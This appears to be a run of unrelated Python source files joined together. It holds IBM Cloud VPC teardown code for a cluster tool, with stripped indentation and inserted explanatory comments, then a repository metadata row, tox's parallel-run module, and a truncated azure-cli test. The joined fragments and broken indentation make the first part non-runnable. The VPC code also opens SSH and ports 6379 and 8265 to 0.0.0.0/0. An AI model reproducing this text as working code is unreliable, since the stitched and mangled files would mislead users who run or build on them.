vpc_client.delete_floating_ip(ip["id"])
logger.debug(f"Deleting VM: {vm_data['id']}")
vpc_client.delete_instance(id=vm_data["id"])
# pylint: disable=line-too-long E1136
res = vpc_client.list_instances(vpc_id=vpc_id).get_result()
num_instances = res["total_count"]
# Delete VSIs if exist
if num_instances:
instances = res["instances"]
with ThreadPoolExecutor(num_instances) as ex:
for i in range(num_instances):
ex.submit(_del_instance, instances[i])
# wait until all vms are deleted to proceed
_poll_vpc_contains_vms(vpc_id)
def delete_subnets(self, vpc_client, vpc_data, region):
def _poll_subnet_deleted(subnet_id):
tries = 10
sleep_interval = 2
while tries:
try:
vpc_client.get_subnet(subnet_id).get_result()
except ibm.ibm_cloud_sdk_core.ApiException:
logger.debug(f"Deleted subnet id: {subnet_id}")
return True
tries -= 1
time.sleep(sleep_interval)
logger.error("Failed to delete instance within the alloted time\n")
return False
for subnet_id in self.get_vpc_subnets(vpc_data, region, field="id"):
# get_result() used for synchronization
logger.debug(f"Deleting subnet: {subnet_id}")
vpc_client.delete_subnet(subnet_id).get_result()
_poll_subnet_deleted(subnet_id)
def delete_gateways(self, vpc_client, vpc_id):
"""deletes all gateways attached to the specified vpc"""
# pylint: disable=line-too-long
gateways = vpc_client.list_public_gateways(
resource_group_id=self.resource_group_id
).get_result()["public_gateways"]
gateways_ids_of_vpc = [
gateway["id"] for gateway in gateways if gateway["vpc"]["id"] == vpc_id
]
for gateway_id in gateways_ids_of_vpc:
# get_result() used for synchronization
logger.debug(f"Deleting gateway: {gateway_id}")
vpc_client.delete_public_gateway(gateway_id).get_result()
def add_missing_sg_rules(self, sec_group_id):
missing_rules = self.get_unsatisfied_security_group_rules(sec_group_id)
if missing_rules:
for val in missing_rules.values():
logger.debug(f"missing {val}")
for missing_rule in missing_rules.keys():
sg_rule_prototype = _build_security_group_rule_prototype_model(
missing_rule, sec_group_id
)
self.vpc_client.create_security_group_rule(
sec_group_id, sg_rule_prototype
).get_result()
def get_unsatisfied_security_group_rules(self, sg_id):
"""
returns unsatisfied security group rules.
"""
unsatisfied_rules = copy.deepcopy(REQUIRED_RULES)
sg = self.vpc_client.get_security_group(sg_id).get_result()
for rule in sg["rules"]:
# pylint: disable=line-too-long
# check outbound rules that are not associated with a specific IP address range
if rule["direction"] == "outbound" and rule["remote"] == {
"cidr_block": "0.0.0.0/0"
}:
if rule["protocol"] == "all":
# outbound is fine!
unsatisfied_rules.pop("outbound_tcp_all", None)
unsatisfied_rules.pop("outbound_udp_all", None)
elif rule["protocol"] == "tcp":
unsatisfied_rules.pop("outbound_tcp_all", None)
elif rule["protocol"] == "udp":
unsatisfied_rules.pop("outbound_udp_all", None)
# Check inbound rules
elif rule["direction"] == "inbound":
# check rules that are not associated with a specific IP address range
if rule["remote"] == {"cidr_block": "0.0.0.0/0"}:
                    # we are interested only in 'all' or tcp protocols
                    if rule["protocol"] == "all":
                        # there is a rule permitting all traffic
unsatisfied_rules.pop("inbound_tcp_sg", None)
unsatisfied_rules.pop("inbound_tcp_22", None)
unsatisfied_rules.pop("inbound_tcp_6379", None)
unsatisfied_rules.pop("inbound_tcp_8265", None)
elif rule["protocol"] == "tcp":
if rule["port_min"] == 1 and rule["port_max"] == 65535:
# all ports are open
unsatisfied_rules.pop("inbound_tcp_sg", None)
unsatisfied_rules.pop("inbound_tcp_22", None)
unsatisfied_rules.pop("inbound_tcp_6379", None)
unsatisfied_rules.pop("inbound_tcp_8265", None)
else:
port_min = rule["port_min"]
port_max = rule["port_max"]
# a single wide rule may cover several required ports,
# so check each port independently rather than via elif
if port_min <= 22 and port_max >= 22:
    unsatisfied_rules.pop("inbound_tcp_22", None)
if port_min <= 6379 and port_max >= 6379:
    unsatisfied_rules.pop("inbound_tcp_6379", None)
if port_min <= 8265 and port_max >= 8265:
    unsatisfied_rules.pop("inbound_tcp_8265", None)
# rule regards private traffic within the VSIs associated with the security group
elif rule["remote"].get("id") == sg["id"]:
# validate that inbound traffic inside group available
if rule["protocol"] == "all" or rule["protocol"] == "tcp":
unsatisfied_rules.pop("inbound_tcp_sg", None)
return unsatisfied_rules
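# Hedged illustration (not part of the module): REQUIRED_RULES is defined
# elsewhere in this file and is not shown here. From the pops above, its keys
# can be inferred to be roughly:
#   "outbound_tcp_all", "outbound_udp_all", "inbound_tcp_sg",
#   "inbound_tcp_22", "inbound_tcp_6379", "inbound_tcp_8265"
# where each key encodes "<direction>_<protocol>_<port | 'all' | 'sg'>",
# the format consumed by _build_security_group_rule_prototype_model() below.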
def remote_cluster_removal(self, vpc_id, region):
"""deletes the vpc and its associated resources
using the FaaS service: ibm cloud functions.
Used only when cluster is set to be deleted
remotely, e.g. by `sky autostop --down`"""
cc = ClusterCleaner(self.resource_group_id, vpc_id, region)
cc.delete_cluster()
def _build_security_group_rule_prototype_model(missing_rule, sg_id=None):
direction, protocol, port = missing_rule.split("_")
remote = {"cidr_block": "0.0.0.0/0"}
try: # port number was specified
port = int(port)
port_min = port
port_max = port
# pylint: disable=W0703
except Exception:
port_min = 1
port_max = 65535
# only valid if security group already exists
if port == "sg":
if not sg_id:
return None
remote = {"id": sg_id}
return {
"direction": direction,
"ip_version": "ipv4",
"protocol": protocol,
"remote": remote,
"port_min": port_min,
"port_max": port_max,
}
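# Hedged illustration (not part of the module): given the name encoding above,
# a call such as
#   _build_security_group_rule_prototype_model("inbound_tcp_22")
# would return
#   {"direction": "inbound", "ip_version": "ipv4", "protocol": "tcp",
#    "remote": {"cidr_block": "0.0.0.0/0"}, "port_min": 22, "port_max": 22}
# while "inbound_tcp_sg" swaps the remote for {"id": sg_id} and opens all ports.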
class ClusterCleaner:
"""Responsible for deleting a cluster with all its associated
resources. Used when the remote cluster head is requested to
dismantle its cluster."""
# default region for the cloud function namespace
namespace_region = "us-east"
# default name for the cloud function namespace (cf doesn't support tagging)
namespace_name = "skypilot-namespace"
# default name for the cloud function action.
action_name = "skypilot-vpc-cleaner-action"
# url to cloud function's namespaces in the chosen region: `namespace_region`
cf_namespaces_url = (
f"https://{namespace_region}.functions.cloud.ibm.com/api/v1/namespaces"
)
def __init__(self, resource_group_id, vpc_id, vpc_region) -> None:
self.resource_group_id = resource_group_id
self.vpc_id = vpc_id
self.vpc_region = vpc_region
function_code = textwrap.dedent(
"""
import subprocess
import time
from concurrent.futures import ThreadPoolExecutor
RAY_RECYCLABLE = "ray-recyclable"
ibm_vpc_client = None
# modules installed and imported inside the entry point (main)
ibm_vpc = None
ibm_cloud_sdk_core = None
def get_vpc_data(vpc_id):
if not vpc_id: return None
try:
vpc_data = ibm_vpc_client.get_vpc(vpc_id).result
return vpc_data
except ibm_cloud_sdk_core.ApiException as e:
if e.code == 404:
print(("VPC doesn't exist."))
return None
else: raise
def delete_subnets(vpc_data):
def _poll_subnet_exists(subnet_id):
tries = 30 # waits up to 5 min with 10 sec interval
sleep_interval = 10
while tries:
try:
subnet_data = ibm_vpc_client.get_subnet(subnet_id).result
except Exception:
print('Deleted subnet id: {}'.format(subnet_id))
return True
tries -= 1
time.sleep(sleep_interval)
print(f"Failed to delete instance within expected time frame of {tries*sleep_interval/60} minutes.")
return False
subnets_attached_to_routing_table = ibm_vpc_client.list_subnets(routing_table_id = vpc_data['default_routing_table']['id']).get_result()['subnets']
subnets_ids = [subnet['id'] for subnet in subnets_attached_to_routing_table]
for id in subnets_ids:
try:
ibm_vpc_client.delete_subnet(id).get_result()
_poll_subnet_exists(id)
except ibm_cloud_sdk_core.ApiException as e:
if e.code == 404:
print("subnet doesn't exist.")
def delete_gateways(vpc_id):
gateways = ibm_vpc_client.list_public_gateways(resource_group_id=RESOURCE_GROUP_ID).get_result()['public_gateways']
gateways_ids_of_vpc = [gateway['id'] for gateway in gateways if gateway['vpc']['id']== vpc_id]
for gateway_id in gateways_ids_of_vpc:
deleting_resource = True
while deleting_resource:
try:
ibm_vpc_client.delete_public_gateway(gateway_id).get_result()
deleting_resource = False
except ibm_cloud_sdk_core.ApiException as e:
if e.code == 404:
print("gateway doesn't exist.")
deleting_resource = False
if e.code == 409:
print("gateway still in use.")
# will retry until cloud functions timeout.
time.sleep(5)
def delete_vms(vpc_id):
def _poll_vpc_contains_vms(vpc_id):
tries = 60
sleep_interval = 3
while tries:
# list_instances() never raises an exception; check values instead
res = ibm_vpc_client.list_instances(vpc_id=vpc_id).get_result()
if not res["total_count"]:
return True
else:
tries -= 1
time.sleep(sleep_interval)
raise Exception(
"Failed to delete VPC's instances within "
"the expected time frame. Cannot "
"continue to delete VPC."
)
def _del_instance(vm_data):
# first delete ips created by node_provider
nic_id = vm_data["network_interfaces"][0]["id"]
res = ibm_vpc_client.list_instance_network_interface_floating_ips(
vm_data["id"], nic_id
).get_result()
floating_ips = res.get("floating_ips", [])
for ip in floating_ips:
if ip["name"].startswith(RAY_RECYCLABLE):
print(f"Deleting IP: {ip['id']}")
ibm_vpc_client.delete_floating_ip(ip["id"])
print(f"Deleting VM: {vm_data['id']}")
ibm_vpc_client.delete_instance(id=vm_data["id"])
res = ibm_vpc_client.list_instances(vpc_id=vpc_id).get_result()
num_instances = res["total_count"]
# Delete VSIs if any exist
if num_instances:
instances = res["instances"]
with ThreadPoolExecutor(num_instances) as ex:
for i in range(num_instances):
ex.submit(_del_instance, instances[i])
# wait until all vms are deleted to proceed
_poll_vpc_contains_vms(vpc_id)
def delete_unbound_vpc(vpc_id):
deleting_resource = True
while deleting_resource:
try:
ibm_vpc_client.delete_vpc(vpc_id).get_result()
deleting_resource = False
except ibm_cloud_sdk_core.ApiException as e:
if e.code == 404:
print("VPC doesn't exist.")
deleting_resource = False
if e.code == 409:
print("VPC still in use.")
# will retry until cloud functions timeout.
time.sleep(5)
def delete_vpc(vpc_id):
vpc_data = get_vpc_data(vpc_id)
if not vpc_data:
print((f"Failed to find a VPC with id={vpc_id}"))
return
print(f"Deleting vpc:{vpc_data['name']} with id:{vpc_id}")
delete_vms(vpc_id)
delete_subnets(vpc_data)
delete_gateways(vpc_id)
delete_unbound_vpc(vpc_id)
print(f"VPC {vpc_data['name']} and its attached resources were deleted successfully")
def main(dict):
global ibm_vpc_client, RESOURCE_GROUP_ID, ibm_cloud_sdk_core, ibm_vpc
def install_package(package):
pip_location_stdout = subprocess.run(['which', 'pip'], capture_output=True, text=True)
pip_location = pip_location_stdout.stdout.strip()
subprocess.call([pip_location, 'install', package], stdout=subprocess.DEVNULL, stderr=subprocess.STDOUT)
for package in ["ibm-vpc", "ibm-cloud-sdk-core"]:
install_package(package)
import ibm_vpc as _ibm_vpc
import ibm_cloud_sdk_core as _ibm_cloud_sdk_core
ibm_vpc = _ibm_vpc
ibm_cloud_sdk_core = _ibm_cloud_sdk_core
iam_api_key, RESOURCE_GROUP_ID, vpc_id, region = dict['iam_api_key'], dict['resource_group_id'], dict['vpc_id'], dict['region']
authenticator = ibm_cloud_sdk_core.authenticators.IAMAuthenticator(iam_api_key, url=None)
ibm_vpc_client = ibm_vpc.VpcV1('2022-06-30',authenticator=authenticator)
if not region:
raise Exception("VPC not found in any region")
ibm_vpc_client.set_service_url(f'https://{region}.iaas.cloud.ibm.com/v1')
delete_vpc(vpc_id=vpc_id)
return {"Status": "Success"}
"""
)
def get_headers(self):
return {
"Content-Type": "application/json",
"Accept": "application/json",
"Authorization": "Bearer " + ibm.get_oauth_token(),
}
def create_or_fetch_namespace(self):
"""returns namespace id.
creates a namespace with given name in specified region.
if namespace exists returns its id instead."""
def _create_new_namespace():
logger.info(
f"Creating a new namespace: {self.namespace_name} in {self.namespace_region}"
)
data = {
"name": self.namespace_name,
"resource_group_id": self.resource_group_id,
"resource_plan_id": "functions-base-plan",
}
res = requests.post(
    self.cf_namespaces_url, headers=self.get_headers(), json=data
)
if res.status_code != 200:
    logger.error(res.text)
namespace_id = res.json()["id"]
logger.info(f"Created new namespace with id: {namespace_id}")
return namespace_id
def _get_cloud_function_namespaces_metadata(offset=0):
"""returns meta data on namespaces of ibm cloud functions within a specified region
:param offset - offset from the beginning of the list of results attained from the GET request,
which may contain up to 200 namespaces per http response"""
res = requests.get(
f"{self.cf_namespaces_url}?limit=200&offset={offset}",
headers=self.get_headers(),
)
return json.loads(res.text)
def _get_cloud_function_namespaces():
"""returns relevant metadata on existing namespaces within a given region."""
logger.info(
f"Obtaining Cloud Function namespaces in {self.namespace_region}"
)
namespaces = []
collecting_namespaces = True
max_limit = 200
offset = 0
# the namespaces request is limited to 200 results at a time, so it is fulfilled in increments of 200.
while collecting_namespaces:
namespace_metadata = _get_cloud_function_namespaces_metadata(offset)
if namespace_metadata["total_count"] == max_limit:
offset += max_limit
else:
collecting_namespaces = False
for name_space in namespace_metadata["namespaces"]:
if "name" in name_space: # API based namespace
namespaces.append(
{
"name": name_space["name"],
"type": "API_based",
"id": name_space["id"],
"region": name_space["location"],
}
)
else: # cloud foundry based namespace
namespaces.append(
{
"name": name_space["id"],
"type": "CF_based",
"region": name_space["location"],
}
)
return namespaces
namespaces_in_region = _get_cloud_function_namespaces()
target_namespace_id = None
if namespaces_in_region:
target_namespace_id = next(
(
namespace["id"]
for namespace in namespaces_in_region
if namespace["name"] == self.namespace_name
),
None,
)
if not target_namespace_id:
target_namespace_id = _create_new_namespace()
else:
logger.info(f"Reusing namespace: {target_namespace_id}")
return target_namespace_id
def _get_cloud_functions_actions(self, namespace_id):
"""returns meta data on namespaces of ibm cloud functions within a specified region
:param offset - offset from the beginning of the list of results attained from the GET request,
which may contain up to 200 namespaces per http response"""
res = requests.get(
f"{self.cf_namespaces_url}/{namespace_id}/actions?limit=200",
headers=self.get_headers(),
)
return json.loads(res.text)
def create_action(self, namespace_id):
logger.info(f"creating action on namespace: {namespace_id}")
# Define the function parameters
function_params = {
"exec": {"kind": "python:3.9", "code": self.function_code},
"limits": {"timeout": 600000},
}
res = requests.put(
f"{self.cf_namespaces_url}/{namespace_id}/actions/{self.action_name}?blocking=true&overwrite=true",
headers=self.get_headers(),
data=json.dumps(function_params),
)
if res.status_code != 200:
logger.error(res.text)
return json.loads(res.text)
def delete_action(self, namespace_id):
"""return the deleted function's metadata if it existed."""
logger.info(f"deleting action on namespace: {namespace_id}")
res = requests.delete(
f"{self.cf_namespaces_url}/{namespace_id}/actions/{self.action_name}?blocking=true",
headers=self.get_headers(),
)
if res.status_code != 200:
logger.warning(res.text)
return json.loads(res.text)
def invoke_action(self, namespace_id: str):
logger.info(f"invoking action on namespace: {namespace_id}")
payload = {
"iam_api_key": ibm.get_api_key(),
"resource_group_id": self.resource_group_id,
"vpc_id": self.vpc_id,
"region": self.vpc_region,
}
res = requests.post(
f"{self.cf_namespaces_url}/{namespace_id}/actions/{self.action_name}?blocking=true",
headers=self.get_headers(),
data=json.dumps(payload),
)
if res.status_code != 200:
logger.error(res.text)
return json.loads(res.text)
def delete_cluster(self):
"""Deletes VPC with id==self.vpc_id.
1. creates a CloudFunctions namespace named ClusterCleaner.namespace_name if doesn't exists.
2. using idempotent function that deletes an action named ClusterCleaner.action_name if exists.
3. invokes the action to delete the VPC and all its resources."""
cf_namespace_id = self.create_or_fetch_namespace()
self.delete_action(cf_namespace_id)
self.create_action(cf_namespace_id)
self.invoke_action(cf_namespace_id)
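# Hedged usage sketch (not part of the module; all IDs below are placeholders):
#
#   cleaner = ClusterCleaner(
#       resource_group_id="<resource-group-id>",
#       vpc_id="<vpc-id>",
#       vpc_region="us-south",
#   )
#   cleaner.delete_cluster()
#
# delete_cluster() provisions the namespace and action on first use, then
# invokes the action, which deletes the VPC remotely via IBM Cloud Functions.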
|
9d1fe07e5381c69f1443f8cf7b916acf1066c792
|
47d69d21f53333d93d5ba9973840ef192808a090
|
/src/tox/session/cmd/run/common.py
|
1bc0fc77c6474bcd2bf6cdbd2d107541209f2caf
|
[
"MIT"
] |
permissive
|
tox-dev/tox
|
27ce3072e7faf5c88ed5305bbd66359369bba13d
|
da0885cd162fb02de866831a75eca9dcfe87eb36
|
refs/heads/main
| 2023-09-01T11:45:18.097559
| 2023-08-31T14:51:57
| 2023-08-31T14:51:57
| 68,465,360
| 3,512
| 624
|
MIT
| 2023-09-11T20:58:32
| 2016-09-17T16:54:22
|
Python
|
UTF-8
|
Python
| false
| false
| 17,665
|
py
|
common.py
|
"""Common functionality shared across multiple type of runs."""
from __future__ import annotations
import logging
import os
import random
import sys
import time
from argparse import Action, ArgumentError, ArgumentParser, Namespace
from concurrent.futures import CancelledError, Future, ThreadPoolExecutor, as_completed
from pathlib import Path
from signal import SIGINT, Handlers, signal
from threading import Event, Thread
from typing import TYPE_CHECKING, Any, Iterator, Optional, Sequence, cast
from colorama import Fore
from tox.config.types import EnvList
from tox.execute import Outcome
from tox.journal import write_journal
from tox.session.cmd.run.single import ToxEnvRunResult, run_one
from tox.tox_env.runner import RunToxEnv
from tox.util.ci import is_ci
from tox.util.graph import stable_topological_sort
from tox.util.spinner import MISS_DURATION, Spinner
if TYPE_CHECKING:
from tox.session.state import State
from tox.tox_env.api import ToxEnv
class SkipMissingInterpreterAction(Action):
def __call__(
self,
parser: ArgumentParser, # noqa: ARG002
namespace: Namespace,
values: str | Sequence[Any] | None,
option_string: str | None = None, # noqa: ARG002
) -> None:
value = "true" if values is None else values
if value not in ("config", "true", "false"):
raise ArgumentError(self, f"value must be 'config', 'true', or 'false' (got {value!r})")
setattr(namespace, self.dest, value)
class InstallPackageAction(Action):
def __call__(
self,
parser: ArgumentParser, # noqa: ARG002
namespace: Namespace,
values: str | Sequence[Any] | None,
option_string: str | None = None, # noqa: ARG002
) -> None:
if not values:
raise ArgumentError(self, "cannot be empty")
path = Path(cast(str, values)).absolute()
if not path.exists():
raise ArgumentError(self, f"{path} does not exist")
if not path.is_file():
raise ArgumentError(self, f"{path} is not a file")
setattr(namespace, self.dest, path)
def env_run_create_flags(parser: ArgumentParser, mode: str) -> None: # noqa: C901
# mode can be one of: run, run-parallel, legacy, devenv, config
if mode not in ("config", "depends"):
parser.add_argument(
"--result-json",
dest="result_json",
metavar="path",
of_type=Path,
default=None,
help="write a JSON file with detailed information about all commands and results involved",
)
if mode not in ("devenv", "depends"):
parser.add_argument(
"-s",
"--skip-missing-interpreters",
default="config",
metavar="v",
nargs="?",
action=SkipMissingInterpreterAction,
help="don't fail tests for missing interpreters: {config,true,false} choice",
)
if mode not in ("devenv", "config", "depends"):
parser.add_argument(
"-n",
"--notest",
dest="no_test",
help="do not run the test commands",
action="store_true",
)
parser.add_argument(
"-b",
"--pkg-only",
"--sdistonly",
action="store_true",
help="only perform the packaging activity",
dest="package_only",
)
parser.add_argument(
"--installpkg",
help="use specified package for installation into venv, instead of packaging the project",
default=None,
of_type=Optional[Path],
action=InstallPackageAction,
dest="install_pkg",
)
if mode not in ("devenv", "depends"):
parser.add_argument(
"--develop",
action="store_true",
help="install package in development mode",
dest="develop",
)
if mode not in ("depends",):
class SeedAction(Action):
def __call__(
self,
parser: ArgumentParser, # noqa: ARG002
namespace: Namespace,
values: str | Sequence[Any] | None,
option_string: str | None = None, # noqa: ARG002
) -> None:
if values == "notset":
result = None
else:
try:
result = int(cast(str, values))
if result <= 0:
msg = "must be greater than zero"
raise ValueError(msg) # noqa: TRY301
except ValueError as exc:
raise ArgumentError(self, str(exc)) from exc
setattr(namespace, self.dest, result)
if os.environ.get("PYTHONHASHSEED", "random") != "random":
hashseed_default = int(os.environ["PYTHONHASHSEED"])
else:
hashseed_default = random.randint(1, 1024 if sys.platform == "win32" else 4294967295) # noqa: S311
parser.add_argument(
"--hashseed",
metavar="SEED",
help="set PYTHONHASHSEED to SEED before running commands. Defaults to a random integer in the range "
"[1, 4294967295] ([1, 1024] on Windows). Passing 'notset' suppresses this behavior.",
action=SeedAction,
of_type=Optional[int],
default=hashseed_default,
dest="hash_seed",
)
parser.add_argument(
"--discover",
dest="discover",
nargs="+",
metavar="path",
help="for Python discovery first try the Python executables under these paths",
default=[],
)
if mode not in ("depends",):
parser.add_argument(
"--no-recreate-pkg",
dest="no_recreate_pkg",
help="if recreate is set do not recreate packaging tox environment(s)",
action="store_true",
)
list_deps = parser.add_mutually_exclusive_group()
list_deps.add_argument(
"--list-dependencies",
action="store_true",
default=is_ci(),
help="list the dependencies installed during environment setup",
)
list_deps.add_argument(
"--no-list-dependencies",
action="store_false",
dest="list_dependencies",
help="never list the dependencies installed during environment setup",
)
if mode not in ("devenv", "config", "depends"):
parser.add_argument(
"--skip-pkg-install",
dest="skip_pkg_install",
help="skip package installation for this run",
action="store_true",
)
def report(start: float, runs: list[ToxEnvRunResult], is_colored: bool, verbosity: int) -> int: # noqa: FBT001
def _print(color_: int, message: str) -> None:
if verbosity:
print(f"{color_ if is_colored else ''}{message}{Fore.RESET if is_colored else ''}") # noqa: T201
successful, skipped = [], []
for run in runs:
successful.append(run.code == Outcome.OK or run.ignore_outcome)
skipped.append(run.skipped)
duration_individual = [o.elapsed for o in run.outcomes] if verbosity >= 2 else [] # noqa: PLR2004
extra = f"+cmd[{','.join(f'{i:.2f}' for i in duration_individual)}]" if duration_individual else ""
setup = run.duration - sum(duration_individual)
msg, color = _get_outcome_message(run)
out = f" {run.name}: {msg} ({run.duration:.2f}{f'=setup[{setup:.2f}]{extra}' if extra else ''} seconds)"
_print(color, out)
duration = time.monotonic() - start
all_good = all(successful) and not all(skipped)
if all_good:
_print(Fore.GREEN, f" congratulations :) ({duration:.2f} seconds)")
return Outcome.OK
_print(Fore.RED, f" evaluation failed :( ({duration:.2f} seconds)")
if len(runs) == 1:
return runs[0].code if not runs[0].skipped else -1
return -1
def _get_outcome_message(run: ToxEnvRunResult) -> tuple[str, int]:
if run.skipped:
msg, color = "SKIP", Fore.YELLOW
elif run.code == Outcome.OK:
msg, color = "OK", Fore.GREEN
elif run.ignore_outcome:
msg, color = f"IGNORED FAIL code {run.code}", Fore.YELLOW
else:
msg, color = f"FAIL code {run.code}", Fore.RED
return msg, color
logger = logging.getLogger(__name__)
def execute(state: State, max_workers: int | None, has_spinner: bool, live: bool) -> int: # noqa: FBT001
interrupt, done = Event(), Event()
results: list[ToxEnvRunResult] = []
future_to_env: dict[Future[ToxEnvRunResult], ToxEnv] = {}
state.envs.ensure_only_run_env_is_active()
to_run_list: list[str] = list(state.envs.iter())
for name in to_run_list:
cast(RunToxEnv, state.envs[name]).mark_active()
previous, has_previous = None, False
try:
spinner = ToxSpinner(has_spinner, state, len(to_run_list))
thread = Thread(
target=_queue_and_wait,
name="tox-interrupt",
args=(state, to_run_list, results, future_to_env, interrupt, done, max_workers, spinner, live),
)
thread.start()
try:
thread.join()
except KeyboardInterrupt:
previous, has_previous = signal(SIGINT, Handlers.SIG_IGN), True
spinner.print_report = False # no need to print reports at this point, final report coming up
logger.error("[%s] KeyboardInterrupt - teardown started", os.getpid()) # noqa: TRY400
interrupt.set()
# cancel in reverse order to not allow submitting new jobs as we cancel running ones
for future, tox_env in reversed(list(future_to_env.items())):
cancelled = future.cancel()
# if cannot be cancelled and not done -> still runs
if cancelled is False and not future.done(): # pragma: no branch
tox_env.interrupt()
done.wait()
# workaround for https://bugs.python.org/issue45274
lock = getattr(thread, "_tstate_lock", None)
if lock is not None and lock.locked(): # pragma: no branch
lock.release() # pragma: no cover
# calling private method to fix thread state
thread._stop() # type: ignore[attr-defined] # pragma: no cover # noqa: SLF001
thread.join()
finally:
name_to_run = {r.name: r for r in results}
ordered_results: list[ToxEnvRunResult] = [name_to_run[env] for env in to_run_list]
# write the journal
write_journal(getattr(state.conf.options, "result_json", None), state._journal) # noqa: SLF001
# report the outcome
exit_code = report(
state.conf.options.start,
ordered_results,
state.conf.options.is_colored,
state.conf.options.verbosity,
)
if has_previous:
signal(SIGINT, previous)
return exit_code
class ToxSpinner(Spinner):
def __init__(self, enabled: bool, state: State, total: int) -> None: # noqa: FBT001
super().__init__(
enabled=enabled,
colored=state.conf.options.is_colored,
stream=state._options.log_handler.stdout, # noqa: SLF001
total=total,
)
def update_spinner(self, result: ToxEnvRunResult, success: bool) -> None: # noqa: FBT001
done = (self.skip if result.skipped else self.succeed) if success else self.fail
done(result.name)
def _queue_and_wait( # noqa: C901, PLR0913, PLR0915
state: State,
to_run_list: list[str],
results: list[ToxEnvRunResult],
future_to_env: dict[Future[ToxEnvRunResult], ToxEnv],
interrupt: Event,
done: Event,
max_workers: int | None,
spinner: ToxSpinner,
live: bool, # noqa: FBT001
) -> None:
try:
options = state._options # noqa: SLF001
with spinner:
max_workers = len(to_run_list) if max_workers is None else max_workers
completed: set[str] = set()
envs_to_run_generator = ready_to_run_envs(state, to_run_list, completed)
def _run(tox_env: RunToxEnv) -> ToxEnvRunResult:
spinner.add(tox_env.conf.name)
return run_one(
tox_env,
options.parsed.no_test or options.parsed.package_only,
suspend_display=live is False,
)
try:
executor = ThreadPoolExecutor(max_workers=max_workers, thread_name_prefix="tox-driver")
env_list: list[str] = []
while True:
for env in env_list: # queue all available
tox_env_to_run = cast(RunToxEnv, state.envs[env])
if interrupt.is_set(): # queue the rest as failed upfront
tox_env_to_run.teardown()
future: Future[ToxEnvRunResult] = Future()
res = ToxEnvRunResult(name=env, skipped=False, code=-2, outcomes=[], duration=MISS_DURATION)
future.set_result(res)
else:
future = executor.submit(_run, tox_env_to_run)
future_to_env[future] = tox_env_to_run
if not future_to_env:
result: ToxEnvRunResult | None = None
else: # if we have queued wait for completed
future = next(as_completed(future_to_env))
tox_env_done = future_to_env.pop(future)
try:
result = future.result()
except CancelledError:
tox_env_done.teardown()
name = tox_env_done.conf.name
result = ToxEnvRunResult(
name=name,
skipped=False,
code=-3,
outcomes=[],
duration=MISS_DURATION,
)
results.append(result)
completed.add(result.name)
env_list = next(envs_to_run_generator, [])
# if nothing running and nothing more to run we're done
final_run = not env_list and not future_to_env
if final_run: # disable report on final env
spinner.print_report = False
if result is not None:
_handle_one_run_done(result, spinner, state, live)
if final_run:
break
except BaseException: # pragma: no cover
logging.exception("Internal Error") # pragma: no cover
raise # pragma: no cover
finally:
executor.shutdown(wait=True)
finally:
try:
# call teardown - configuration only environments for example could not be finished
for name in to_run_list:
state.envs[name].teardown()
finally:
done.set()
def _handle_one_run_done(
result: ToxEnvRunResult,
spinner: ToxSpinner,
state: State,
live: bool, # noqa: FBT001
) -> None:
success = result.code == Outcome.OK
spinner.update_spinner(result, success)
tox_env = cast(RunToxEnv, state.envs[result.name])
if tox_env.journal: # add overall journal entry
tox_env.journal["result"] = {
"success": success,
"exit_code": result.code,
"duration": result.duration,
}
if live is False and state.conf.options.parallel_live is False: # teardown background run
out_err = tox_env.close_and_read_out_err() # sync writes from buffer to stdout/stderr
pkg_out_err_list = []
for package_env in tox_env.package_envs:
pkg_out_err = package_env.close_and_read_out_err()
if pkg_out_err is not None: # pragma: no branch
pkg_out_err_list.append(pkg_out_err)
if not success or tox_env.conf["parallel_show_output"]:
for pkg_out_err in pkg_out_err_list:
state._options.log_handler.write_out_err(pkg_out_err) # pragma: no cover # noqa: SLF001
if out_err is not None: # pragma: no branch # first show package build
state._options.log_handler.write_out_err(out_err) # noqa: SLF001
def ready_to_run_envs(state: State, to_run: list[str], completed: set[str]) -> Iterator[list[str]]:
"""Generate tox environments ready to run."""
order, todo = run_order(state, to_run)
while order:
ready_to_run: list[str] = []
new_order: list[str] = []
for env in order: # collect next batch of ready to run
if todo[env] - completed:
new_order.append(env)
else:
ready_to_run.append(env)
order = new_order
yield ready_to_run
def run_order(state: State, to_run: list[str]) -> tuple[list[str], dict[str, set[str]]]:
to_run_set = set(to_run)
todo: dict[str, set[str]] = {}
for env in to_run:
run_env = cast(RunToxEnv, state.envs[env])
depends = set(cast(EnvList, run_env.conf["depends"]).envs)
todo[env] = to_run_set & depends
order = stable_topological_sort(todo)
return order, todo
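# Hedged illustration (not part of tox): the batching performed by
# run_order()/ready_to_run_envs() above can be mimicked with a plain
# dependency dict; names below are hypothetical.
def _demo_batches(todo: dict[str, set[str]]) -> list[list[str]]:
    completed: set[str] = set()
    order, batches = list(todo), []
    while order:
        # an env is ready once all of its pending dependencies have completed
        ready = [env for env in order if not (todo[env] - completed)]
        if not ready:  # cyclic dependency; bail out in this toy version
            break
        order = [env for env in order if todo[env] - completed]
        batches.append(ready)
        completed.update(ready)
    return batches

# _demo_batches({"a": set(), "b": set(), "c": {"a", "b"}}) -> [["a", "b"], ["c"]]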
|
33be9a6cfead71b0842df603e9ed9ec815abe9cf
|
a4ea525e226d6c401fdb87a6e9adfdc5d07e6020
|
/src/azure-cli/azure/cli/command_modules/security/tests/latest/test_security_contacts_scenario.py
|
812a76ffd7880329d166cf7b48eed9519bda2608
|
[
"MIT",
"BSD-3-Clause",
"LGPL-2.0-or-later",
"GPL-1.0-or-later",
"MPL-2.0",
"LGPL-2.1-only",
"Apache-2.0",
"LGPL-2.1-or-later",
"BSD-2-Clause"
] |
permissive
|
Azure/azure-cli
|
13340eeca2e288e66e84d393fa1c8a93d46c8686
|
a40fd14ad0b6e89720a2e58d4d9be3a6ce1535ca
|
refs/heads/dev
| 2023-08-17T06:25:37.431463
| 2023-08-17T06:00:10
| 2023-08-17T06:00:10
| 51,040,886
| 4,018
| 3,310
|
MIT
| 2023-09-14T11:11:05
| 2016-02-04T00:21:51
|
Python
|
UTF-8
|
Python
| false
| false
| 1,631
|
py
|
test_security_contacts_scenario.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from azure.cli.testsdk import ScenarioTest
from azure.cli.testsdk.scenario_tests import AllowLargeResponse
class SecurityCenterSecurityContactsTests(ScenarioTest):
def test_security_contacts(self):
security_contacts = self.cmd('az security contact list').get_output_in_json()
previous_contacts_count = len(security_contacts)
assert previous_contacts_count >= 0
self.cmd('az security contact create -n default1 --email john@contoso.com --alert-notifications off --alerts-admins off')
